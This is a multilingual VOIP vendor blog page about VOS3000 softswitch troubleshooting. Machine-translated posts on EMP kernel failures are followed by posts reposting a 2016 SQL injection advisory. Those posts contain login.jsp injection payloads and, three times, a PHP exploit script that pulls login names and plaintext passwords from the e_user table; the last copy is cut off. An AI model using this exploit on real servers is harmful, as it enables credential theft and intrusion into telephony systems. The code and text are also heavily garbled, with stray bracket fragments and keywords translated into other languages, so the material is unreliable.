Skip to content
  • Home
  • Cheapest VOS3000 Server Rent, VOS3000 Best Trusted Vendor
  • VOS3000 Softswitch
Search
Close

VOS3000

MULTAHOST Blog for VOS3000 Troubleshoot

Tag: VOS3000 Auto Invoice

multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

Error de inicio de EMP en VOS3000 Server SSH, ¿Cómo resolver?

June 7, 2019March 18, 2026 king

Error de inicio de EMP en VOS3000 Server SSH, ¿Cómo resolver?

Hola a todos,

• inicio del servicio e
mpd Inicio del servicio kunshi emp: [FAILED]

Muchos de ustedes se enfrentan a problema EMP Inicio fallado después de dar el comando para EMP, Hay muchas razones, voy a describir ahora un problema importante. VOS3000 Emp no es compatible con todas las versiones del kernel de Linux. El sistema operativo utilizado principalmente para VOS3000 es CentOS, Centos 5.11 ya no es compatible con centos, por lo que es difícil obtenerlo de cualquier centro de datos, pero es posible. Necesito arreglar el archivo Repo en ese caso. También Centos 6.10 o Centos 7 tampoco soportan muchas versiones de VOS3000. Principalmente emp no iniciar debido a la problema del kernel. sin emp start no se puede iniciar MBX. En ese caso, debe degradar kernel al kernel soportado o necesita actualizar el kernel a uno compatible. Estoy compartiendo la lista del kernel soportado emp aquí en el archivo adjunto. Así que usted puede actualizar y degradar fácilmente.

Para actualizar o degradar la versión del núcleo se puede buscar en google, hay muchos manuales fáciles para eso.

lista de kernels soportados emp

Algunos comandos importantes que necesita saber para el problema del kernel con vos3000.

Usted necesita utilizar el comando estándar rpm para enumerar el software instalado. Escriba el siguiente comando en el símbolo del sistema del shell:


$ rpm -qa kernel
Output: kernel-2.6.18-4.1.15.el5 kernel-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

Si necesitas más ayuda sólo whatsapp me: +8801911119966


VOS3000 Price & Rent – Installation Cost, Server Plans and Pricing Guide

VOS3000 Download & Manual – Official Clients, Documentation and Guides

  • Sistema VOS3000 Tarifas LCR True Essential: Tabla de Tarifas, Prefijos, Ruteo Menor Costo y Area Codigos
  • Sistema VOS3000 Troncal SIP Important: Registro Upstream, Dominio Local, Cabeceras y Transparencia
  • Sistema VOS3000 Media Proxy Accurate: Configuracion, Ancho de Banda, Transcodificacion y Protocolo
  • Sistema VOS3000 Casos Facturacion Real Critical: Cero Duracion, Hangup Servidor, Prefijo Ruta y Tiempo Libre
  • Sistema VOS3000 Patrones Marcacion Important: Wildcards, Longitud, Escape y Ruteo Aleatorio

EMP শুরু VOS3000 সার্ভার SSH-এ ব্যর্থ হয়েছে, কিভাবে সমাধান করতে হবে?

June 7, 2019 king

হ্যালো অল,

# সার্ভিস empd শুরু
কুনশি ইএমপি সেবা শুরু হচ্ছে: [FAILED]

আপনারা অনেকেই ইএমপি-র জন্য আদেশ দেওয়ার পর ইএমপি স্টার্ট ব্যর্থ হয়েছেন, অনেক কারণ আছে, আমি এখন একটি প্রধান বিষয় বর্ণনা করব। VOS3000 Emp লিনাক্সের সকল কার্নেল সংস্করণ সমর্থন করে না। VOS3000 এর জন্য বেশিরভাগ ব্যবহৃত ওএস সেন্টওএস, সেন্টোস 5.11 আর সেন্টোস দ্বারা সমর্থিত নয়, তাই এটি যে কোন ডাটাসেন্টার থেকে পাওয়া কঠিন কিন্তু সম্ভব। সেক্ষেত্রে রেপো ফাইল ঠিক করতে হবে। এছাড়াও সেন্টোস 6.10 বা সেন্টোস 7 এছাড়াও VOS3000 এর অনেক সংস্করণ সমর্থন করেনি। প্রধানত কার্নেল সমস্যার কারণে ইএমপি শুরু হয় না। EMP শুরু ছাড়া আপনি MBX শুরু করতে পারবেন না। সেক্ষেত্রে আপনাকে কার্নেলকে সমর্থিত কার্নেলে নামিয়ে আনতে হবে অথবা সমর্থিত কার্নেল আপগ্রেড করতে হবে। আমি সংযুক্ত ফাইলে EMP সমর্থিত কার্নেল তালিকা এখানে শেয়ার করছি। যাতে আপনি সহজেই আপগ্রেড এবং ডাউনডাউন করতে পারেন।

কার্নেল সংস্করণ আপগ্রেড বা ডাউনগ্রেড করার জন্য আপনি Google এ অনুসন্ধান করতে পারেন, এর জন্য অনেক সহজ ম্যানুয়াল আছে.

EMP সমর্থিত কার্নেল তালিকা

কিছু গুরুত্বপূর্ণ কমান্ড আপনার জানা প্রয়োজন ভোস3000 সঙ্গে কার্নেল ইস্যু জন্য.

ইনস্টল করা সফটওয়্যারতালিকাভুক্ত করতে আপনাকে আদর্শ RPM কমান্ড ব্যবহার করতে হবে। শেল প্রম্পটে নিম্নলিখিত কমান্ড টাইপ করুন:


$ rpm -qa কার্নে
ল আউটপুট: kernel-2.6.18-4.1.15.el5 কার্নেল-2.6.18-8.1.1.el5 k ernel-2.6.18-8.1.10.el5

আপনার যদি আরো সাহায্যের প্রয়োজন হয় তাহলে আমাকে হোয়াটসঅ্যাপ করুন: +৮৮০১৯১১১১৯৯৬৬

فشل EMP ابدأ في خادم VOS3000 SSH، كيفية حل؟

June 7, 2019 king

مرحبا بالجميع ،

# خدمة empd بد
ء بدء خدمة كونشي EMP: [FAILED]

العديد منكم مواجهة قضية EMP ابدأ فشل بعد إعطاء الأمر ل EMP، وهناك سبب كثير، وسوف أصف الآن قضية رئيسية واحدة. VOS3000 لا تدعم EMP جميع إصدارات نواة لينكس. نظام التشغيل المستخدمة في الغالب لVOS3000 هو CentOS، سنتوس 5.11 لم يعد مدعوما من قبل سنتوس، لذلك من الصعب الحصول عليه من أي مركز بيانات ولكن ممكن. تحتاج إلى إصلاح ريبو الملف في هذه الحالة. أيضا سنتاوس 6.10 أو Centos 7 أيضا لا تدعم العديد من الإصدارات من VOS3000. أساسا لا تبدأ emp بسبب مشكلة النواة. دون بدء EMP لا يمكنك بدء MBX. في هذه الحالة لديك لخفض النواة إلى نواة معتمدة أو الحاجة إلى ترقية نواة لدعم واحد. أنا تقاسم EMP قائمة نواة معتمدة هنا في الملف المرفق. حتى تتمكن من الترقية وتقلل بسهولة.

للترقية أو إصدار إصدار Kernel يمكنك البحث في جوجل ، هناك العديد من دليل سهل لذلك.

emp قائمة kernel معتمدة

بعض الأوامر الهامة التي تحتاج إلى معرفتها عن مشكلة النواة مع vos3000.

تحتاج إلى استخدام الأمر دورة في الدقيقة القياسية لقائمة البرامج المثبتة. اكتب الأمر التالي في موجه shell:


$ دورة في الدقيقة
– qa kernelOutput: نواة-2.6.18-4.1.15.el5 نواة 2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

إذا كنت بحاجة إلى مزيد من المساعدة فقط ال whatsapp لي: +880191119966

multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

EMP 启动失败在 VOS3000 服务器 SSH,如何解决 ?

June 7, 2019January 16, 2026 king

EMP 启动失败在 VOS3000 服务器 SSH,如何解决 ?

大家好,

* 服务 empd 启动
启动 kunshi emp 服务: [FAILED]

你们许多人在给出EMP命令后面临EMP启动失败的问题,有很多原因,我现在将描述一个主要问题。 VOS3000 Emp 不支持 Linux 的所有内核版本。 VOS3000 主要用于的 OS 是 CentOS,Centos 5.11 不再受 centos 支持,因此很难从任何数据中心获取,但可能。 在这种情况下, 需要修复存储库文件。 此外, Centos 6.10 或 Centos 7 也不支持 VOS3000 的许多版本。 主要是 emp 由于内核问题而未启动。没有 emp 启动, 你不能启动 Mbx 。 在这种情况下,您必须将内核降级为受支持的内核,或者需要将内核升级到受支持的内核。 我在附加文件中共享 emp 支持的内核列表。 因此,您可以轻松升级和降级。

对于升级或降级内核版本,你可以在谷歌搜索,有很多简单的手册。

emp 支持的内核列表

对于 vos3000 的内核问题,您需要了解一些重要的命令。

您需要使用标准 rpm 命令列出已安装的软件。 在 shell 提示符下键入以下命令:


$ rpm - qa 内核输
出: 内核 – 2.6.18 – 4.15. el5 内核 – 2.6.18 – 8.14.el5 k ernel-2.6.18-8.1.10.el5

如果你需要更多的帮助, 只是什么应用程序我: +880191119966

  • Sistema VOS3000 Tarifas LCR True Essential: Tabla de Tarifas, Prefijos, Ruteo Menor Costo y Area Codigos
  • Sistema VOS3000 Troncal SIP Important: Registro Upstream, Dominio Local, Cabeceras y Transparencia
  • Sistema VOS3000 Media Proxy Accurate: Configuracion, Ancho de Banda, Transcodificacion y Protocolo
  • Sistema VOS3000 Casos Facturacion Real Critical: Cero Duracion, Hangup Servidor, Prefijo Ruta y Tiempo Libre
  • Sistema VOS3000 Patrones Marcacion Important: Wildcards, Longitud, Escape y Ruteo Aleatorio
multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

EMP शुरू VOS3000 सर्वर एसएसएच में विफल रहा है, कैसे हल करने के लिए?

June 7, 2019January 14, 2026 king

EMP शुरू VOS3000 सर्वर एसएसएच में विफल रहा है, कैसे हल करने के लिए?

नमस्ते सभी,

# सेवा empd शुर
ू कुन्शी एम्प सेवा शुरू: [FAILED]

आप में से कई चेहरा मुद्दा EMP शुरू EMP के लिए आदेश देने के बाद विफल रहा है, वहां कई कारण हैं, मैं अब एक प्रमुख मुद्दे का वर्णन करेंगे । VOS3000 Emp लिनक्स के सभी गिरी संस्करणों का समर्थन नहीं करते हैं। ज्यादातर VOS3000 के लिए उपयोग किया जाता है सेंटोस, सेंटोस 5.11 अब सेंटोस द्वारा समर्थित नहीं है, इसलिए इसे किसी भी डेटासेंटर से प्राप्त करना मुश्किल है लेकिन संभव है। उस मामले में रेपो फाइल को ठीक करने की जरूरत है। इसके अलावा सेंटोस 6.10 या सेंटोस 7 ने भी VOS3000 के कई संस्करणों का समर्थन नहीं किया। मुख्य रूप से गिरी मुद्दे के कारण शुरू नहीं किया गया। एम्प स्टार्ट के बिना आप एमबीएक्स शुरू नहीं कर सकते हैं। उस मामले में आप गिरी का समर्थन करने के लिए ढाल या एक समर्थित करने के लिए गिरी को अपग्रेड करने की जरूरत है । मैं संलग्न फ़ाइल में यहां emp समर्थित गिरी सूची साझा कर रहा हूं । तो आप आसानी से अपग्रेड और डाउनग्रेड कर सकते हैं।

अपग्रेड या डाउनग्रेड गिरी वर्जन के लिए आप गूगल में सर्च कर सकते हैं, इसके लिए कई आसान मैनुअल हैं।

एम्प समर्थित गिरी सूची

कुछ महत्वपूर्ण आदेश आप vos3000 के साथ गिरी मुद्दे के लिए पता करने की आवश्यकता है।

स्थापित सॉफ़्टवेयर को सूचीबद्ध करने के लिए आपको मानक आरपीएम कमांड का उपयोग करना होगा। शेल प्रॉम्प्ट पर निम्नलिखित कमांड टाइप करें:


$ rpm-qa kernel
Output: गिरी-2.6.18-4.1.15.el5 गिरी-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

यदि आपको अधिक मदद की जरूरत है तो सिर्फ मुझे व्हाट्सएप करें: +8801911119966

EMP शुरू VOS3000 सर्वर एसएसएच में विफल रहा है, कैसे हल करने के लिए?

June 7, 2019 king

नमस्ते सभी,

# सेवा empd शुर
ू कुन्शी एम्प सेवा शुरू: [FAILED]

आप में से कई चेहरा मुद्दा EMP शुरू EMP के लिए आदेश देने के बाद विफल रहा है, वहां कई कारण हैं, मैं अब एक प्रमुख मुद्दे का वर्णन करेंगे । VOS3000 Emp लिनक्स के सभी गिरी संस्करणों का समर्थन नहीं करते हैं। ज्यादातर VOS3000 के लिए उपयोग किया जाता है सेंटोस, सेंटोस 5.11 अब सेंटोस द्वारा समर्थित नहीं है, इसलिए इसे किसी भी डेटासेंटर से प्राप्त करना मुश्किल है लेकिन संभव है। उस मामले में रेपो फाइल को ठीक करने की जरूरत है। इसके अलावा सेंटोस 6.10 या सेंटोस 7 ने भी VOS3000 के कई संस्करणों का समर्थन नहीं किया। मुख्य रूप से गिरी मुद्दे के कारण शुरू नहीं किया गया। एम्प स्टार्ट के बिना आप एमबीएक्स शुरू नहीं कर सकते हैं। उस मामले में आप गिरी का समर्थन करने के लिए ढाल या एक समर्थित करने के लिए गिरी को अपग्रेड करने की जरूरत है । मैं संलग्न फ़ाइल में यहां emp समर्थित गिरी सूची साझा कर रहा हूं । तो आप आसानी से अपग्रेड और डाउनग्रेड कर सकते हैं।

अपग्रेड या डाउनग्रेड गिरी वर्जन के लिए आप गूगल में सर्च कर सकते हैं, इसके लिए कई आसान मैनुअल हैं।

एम्प समर्थित गिरी सूची

कुछ महत्वपूर्ण आदेश आप vos3000 के साथ गिरी मुद्दे के लिए पता करने की आवश्यकता है।

स्थापित सॉफ़्टवेयर को सूचीबद्ध करने के लिए आपको मानक आरपीएम कमांड का उपयोग करना होगा। शेल प्रॉम्प्ट पर निम्नलिखित कमांड टाइप करें:


$ rpm-qa kernel
Output: गिरी-2.6.18-4.1.15.el5 गिरी-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

यदि आपको अधिक मदद की जरूरत है तो सिर्फ मुझे व्हाट्सएप करें: +8801911119966

Cómo VOS3000 Conseguir Hackeado por SQL Inyección Script, evitar la piratería!

June 4, 2019November 22, 2020 king

Inyección SQL Linknat VOS2009/VOS3000


Desde: Osama Khalid <osama ()="" codinghazard="" com="">
Fecha: Jue, 19 May 2016 16:52:54 +0500</osama>


Se encontró una inyección SQL en Linknat VOS3000/VOS2009, un VoIP popular
softswitch, que podría permitir a los atacantes remotos obtener acceso a la
credenciales almacenadas en texto sin formato.

Aplicación: Linknat VOS3000/VOS2009
Versiones afectadas: 2.1.1.5, 2.1.1.8, 2.1.2.0
URL del proveedor: http://www.linknat.com/
Error: SQLi (con privilegios DBA)
Tipo: Remoto
Resolución: Corregido, actualización a 2.1.2.4 o 2.1.6.0 Versión limpia
Referencia: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

El SQLi reportado es ciego basado en el tiempo. Dado que no es un SQLi en banda, el
resultados pueden obtenerse de la salida de la bienvenida.jsp durante el mismo
Sesión.

(1a solicitud)

POST http://target/eng/login.jsp
PARAM loginType-1
        name ' unión seleccione 1,2,@@version,'hola',5,6?
        pase ' O ''' '

(2a solicitud durante la misma sesión)

OBTENGA http://target/eng/welcome.jsp
RESULTADO 0 ' selección de unión
1,2,@@version,'hola',5,6'1'5.0.51a-comunidad''hola'0.00'0.00'

[ EXPLOIT CODE ]<?php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_[1]one   = isset($argv) ? $argv :[2] "loginna[2]me";
$column_two   = isset($argv) ? $argv : [3]"password[3]";
$table        = isset($argv) ? $argv : "[4]e_user";
[4]$other        = isset($argv) ? $argv : ""[5];

functi[5]on banner() {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3[HOST]000.php 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php v[HOST]o[COL1]s[COL2]3[TABLE]00[OTHER SQL]0.php 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) ?
        foreach ( $post como $key > $value)
            $post_items : $key . '=' . urlencode($value);
 []       $post_string á implode('&', $post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data - curl_exec($curl);
    curl_close($curl);
    $data de retorno;
}

consulta de función ($host, $query)
    $data á curl("http://$host/eng/login.jsp";, array(
            "loginType" (> 1,
            "nombre" > "' unión " . $query . "#",
            "pasar" > "' O ''''"
        ), null, true);
    preg_match_all('' Set-Cookie: (.*$matches $data);
    $cookies de implode('; ', $matches);
    $data á curl("http://$host/eng/welcome.j[1]sp";, array(), $cookies, false);
    $parts de explosión ("", recorte($data));

si (cuenta($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data) {
    [3]$keys = [4]array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid de n.o s2 ($wid, strlen($v));
    }
    foreach($wi[$k]d as $k ?> [$k]$v)
        $fmt : "%--$v";
        $sep á str_repeat('-', $v);
   [$k] }
    $fmt de la página d[$k]e la casa de la casa de los ' . implode(' ? ', $fmt) . ' |';
    $sep '+-' . implode('-+-', $sep) . '-+';
    $buf á array($sep, vsprintf($fmt, $keys), $sep);
    foreach($data as $row) ?
        $buf : vsprintf($fmt, $row)[];
        $buf á $sep;
    }
    implo[]de de retorno ("n", $buf);
}

banner();
echo "n";
echo "Target: $host-n";
echo "Column #1: $column_one-n";
echo "#2 de columnas: $column_two-n";
echo "Tabla: $table";
echo "Otros: $other";
echo "n";

$results - array();
$count_result á query($host, "SELECT 1,2,COUNT(*),4,5,6 FROM $table
$other");
si ($count_result) ?
    $count de intval($count_result);
    echo "Found $count rows...

para[0] ($i-0;<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .=[0]"" "=" . hex2bin($result) .
" n";="" }="" else="[1]" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" []==""> hex2bin $i($result), $column_dos
•[0]> hex2bin($result));
    }

if (c[1]ount($results) > 0)
        echo de eco ". ascii_table($results) . "n";
    }
•otra cosa?
    echo "Error al recuperar el recuento de filas";
}

?></$count;>

A partir de 2016 Personas que utilizan algunos productos blandos de inyección sql para hackear VOS3000, Tenemos nuestro propio sistema de seguridad de ese momento, actualizamos nuestro sistema de seguridad demasiado fuerte ahora, mi enfoque de trabajo siempre fue para la seguridad para voip soft-switch. La mayoría de las veces di consejos gratuitos o compartía información tanto como posible sin costo. Todavía hay un montón de cosas sucias corriendo alrededor, así que por favor tenga cuidado siempre y sepa más. De lo contrario, nunca podrás hacer un buen negocio. Ahora en día Las personas que utilizan scripts ocultos o malwares en el software cliente VOS3000 para hackear VOS Server.

Para más ayuda Knock me en whatsapp: +8801911119966 – voy a hacer ayuda a todas las maneras.

कैसे VOS3000 SQL इंजेक्शन स्क्रिप्ट द्वारा काट दिया हो, हैकिंग को रोकने के!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL इंजेक्शन


से: ओसामा खालिद <osama ()="" codinghazard="" com="">त
िथि: Thu, 19 मई २०१६ 16:52:54 + ०५००</osama>


एक एसक्यूएल इंजेक्शन Linknat VOS3000/VOS2009, एक लोकप्रिय वीओआईपी में पाया गया था
सॉफ्टस्विच, जो दूरदराज के हमलावरों को पहुंच प्राप्त करने की अनुमति दे सकता है
सादे पाठ में संग्रहीत साख।

आवेदन: लिंकनट VOS3000/VOS2009
प्रभावित संस्करण: 2.1.1.5, 2.1.1.8, 2.1.2.0
विक्रेता यूआरएल: http://www.linknat.com/
बग: एसक्यूली (डीबीए विशेषाधिकारों के साथ)
प्रकार: रिमोट
रिज़ॉल्यूशन: फिक्स्ड, 2.1.2.4 या 2.1.6.0 स्वच्छ संस्करण में अपग्रेड करें
संदर्भ: वूयून-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SQLi रिपोर्ट समय आधारित अंधा है । चूंकि यह एक इन-बैंड SQLi नहीं है,
परिणाम उसी के दौरान स्वागत के उत्पादन से इकट्ठा किया जा सकता है.jsp
सत्र।

(पहला अनुरोध)

पद http://target/eng/login.jsp
परम लॉगइनटाइप =1
        नाम = ' संघ का चयन 1,2,@@version, 'नमस्ते', 5,6#
        पास =' या ''='

(इसी सत्र के दौरान दूसरा अनुरोध)

http://target/eng/welcome.jsp जाओ
परिणाम 0.' संघ का चयन
1,2,@@version, 'hello', 5,6 #.1.5.0.51a-community.hello.0.00.0.00.

<?php
#
# Linknat [ EXPLOIT CODE ]VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   = isset[1]($argv) ? $argv : "loginname"[2];
$column_[2]two   = isset($argv) ? $argv : "password";
[3]$table   [3]     = isset($argv) ? $argv : "e_user";
$o[4]ther      [4]  = isset($argv) ? $argv : "";

function[5] banner()[5] {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.ph[HOST]p 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php vos3000[HOST].[COL1]p[COL2]h[TABLE]p[OTHER SQL] 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        फोरच ($post $key = > $value)
            $post_आइटम = $key । '=' . यूरेनकोड ($value);
        []$post_स्ट्रिंग = फटना ('&', $post_आइटम);
        curl_setopt ($curl, CURLOPT_POST, 1);
        curl_setopt ($curl, CURLOPT_POSTFIELDS, $post_स्ट्रिंग);
    }
    $data = curl_exec ($curl);
    curl_close ($curl);
    $data लौटें;
}

फंक्शन क्वेरी ($host, $query) {
    $data = कर्ल ("http://$host/eng/login.jsp";, सरणी (
            "लॉगिनटाइप" = > 1,
            "नाम" = > "संघ" । $query । "#",
            "पास" = > "' या '='"
        ), अशक्त, सच है);
    preg_match_all ('। सेट-कुकी: (.*);..यू', $data, $matches);
    $cookies = फटना ('; ', $matches);
    $data = कर्ल ("http://$host/eng/welcome.j[1]sp";, सरणी (), $cookies, झूठी);
    $parts = विस्फोट (".., ट्रिम ($data));

यदि (गिनती ($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data) {
    $[3]keys = a[4]rray_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = अधिकतम ($wid, स्ट्रेन ($v));
    }
    फोरच ($k [$k]= > $v) के [$k]रूप में $wid {
        $fmt = "%-{$v}s";
        $sep = str_repea[$k]t ('-', $v);
    }
    $fmt[$k] = '। ' . फटना (' । ', $fmt) । ' |';
    $sep = '+-' । फटना ('-+-', $sep) । '-+';
    $buf = सरणी ($sep, वेस्प्रिंट ($fmt, $keys), $sep);
    फोरच ($row के रूप में $data) {
        $buf = vsprintf ($fmt, $row);
        $[]buf = $sep;
    }
    वापसी फटना ("n[]", $buf);
}

बैनर ();
गूंज "n";
गूंज "लक्ष्य: $host  n";
गूंज "कॉलम #1: $column_onen";
गूंज "कॉलम #2: $column_दो n";
गूंज "तालिका: $table n";
गूंज "अन्य: $other n";
गूंज "n";

$results = सरणी ();
$count_result = क्वेरी ($host, "1,2,काउंट (*), 4,5,6 से $table
$other");
यदि ($count_result) {
    $count = intval ($count_result);
    गूंज "पंक्तियों $count पाया...n";

के लिए ($i = [0]0; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .=[0]"" "=" . hex2bin($result) .
" n";="" }="" else=[1]"" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_on[]e" ==""> hex2bin ($result), $column_two
[0]=> हेक्स2बिन ($result));
    }

य[1]दि (गिनती ($results) > 0) {
        गूंज "nn" । ascii_table ($results) । "n";
    }
}अन्य {
    गूंज "त्रुटि पुनः प्राप्त पंक्ति गिनती";
}

?></$count;>

2016 से लोग VOS3000 हैक करने के लिए कुछ वर्ग इंजेक्शन सॉफ्ट माल का उपयोग करते हैं, हमारे पास उस समय से हमारी अपनी सुरक्षा प्रणाली है, हमने अपनी सुरक्षा प्रणाली को अपडेट किया है, अब हमने अपनी सुरक्षा प्रणाली को भी मजबूत किया है, मेरा काम ध्यान वीओआईपी सॉफ्ट-स्विच के लिए सुरक्षा के लिए हमेशा था। अधिकांश समय मैंने मुफ्त सलाह दी या जितना संभव हो उतना मुफ्त जानकारी साझा की। फिर भी बहुत सारी गंदी चीजें चल रही हैं, इसलिए कृपया हमेशा सावधान रहें और अधिक जानें। वरना आप कभी भी अच्छा बिजनेस नहीं कर पाएंगे। अब-एक दिन VOS सर्वर हैक करने के लिए VOS3000 क्लाइंट सॉफ्टवेयर में छिपी स्क्रिप्ट या मैलवेयर का उपयोग कर रहे लोग।

अधिक मदद के लिए मुझे whatsapp में दस्तक: + ८८०१९११११९९६६-मैं सभी तरीकों से मदद करेंगे ।

কিভাবে VOS3000 SQL ইনজেকশন স্ক্রিপ্ট দ্বারা হ্যাক করা হয়, হ্যাকিং প্রতিরোধ!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL ইনজেকশন


থেকে: ওসামা খালিদ <osama ()="" codinghazard="" com="
">তারিখ: 19 মে, 2016 16:52:54 +0500</osama>


একটি এসকিউএল ইনজেকশন লিঙ্কনাট VOS3000/VOS2009, একটি জনপ্রিয় ভিওআইপি পাওয়া গেছে
সফটসুইচ, যা দূরবর্তী আক্রমণকারীদের অ্যাক্সেস পেতে অনুমতি দিতে পারে
সরল-পাঠে সংরক্ষিত প্রমাণপত্রাদি।

আবেদন: লিঙ্কনাট VOS3000/VOS2009
সংস্করণ প্রভাবিত: 2.1.1.5, 2.1.1.8, 2.1.2.0
বিক্রেতার ইউআরএল: http://www.linknat.com/
বাগ: SQLi (DBA সুবিধা সহ)
ধরন: দূরবর্তী
রেজোলিউশন: ফিক্সড, আপগ্রেড 2.1.2.4 অথবা 2.1.6.0 পরিষ্কার সংস্করণ
রেফারেন্স: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

এসকিউলি রিপোর্ট করেছে যে সময় ভিত্তিক অন্ধ। যেহেতু এটি একটি ইন-ব্যান্ড SQLI নয়,
ফলাফল স্বাগতম আউটপুট থেকে সংগ্রহ করা যেতে পারে.jsp একই সময়ে
সুসংবদ্ধ।

(১ম অনুরোধ)

পোস্ট http://target/eng/login.jsp
PARAM লগইনটাইপ=1
        name=' ইউনিয়ন নির্বাচন 1,2,@@version,'হ্যালো', 5,6#
        পাস=' অথবা '='

(একই অধিবেশনে ২য় অনুরোধ)

http://target/eng/welcome.jsp
ফলাফল 0|' ইউনিয়ন নির্বাচন
1,2,@@version,'হ্যালো', 5,6#|1|5.0.51a-সম্প্রদায়|হ্যালো|0.00|0.00|

<?php
#
# Linknat VOS2[ EXPLOIT CODE ]009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   = isset($argv) ? [1]$argv : "loginname";
$column_[2]two   = i[2]sset($argv) ? $argv : "password";
$table    [3]    = isse[3]t($argv) ? $argv : "e_user";
$other        [4]= isset($[4]argv) ? $argv : "";

function banner() {
[5]    echo [5]"########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.php 127.0.0.1n";
  [HOST]  echo "php vos3000.php     n";
    echo "php vos3000.php 127.0.0.1 tab[HOST]l[COL1]e[COL2]_[TABLE]s[OTHER SQL]chema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        প্রতিটি ($key => $value হিসাবে $post
            $post আইটেম = $key। '=' . urlencode($value);
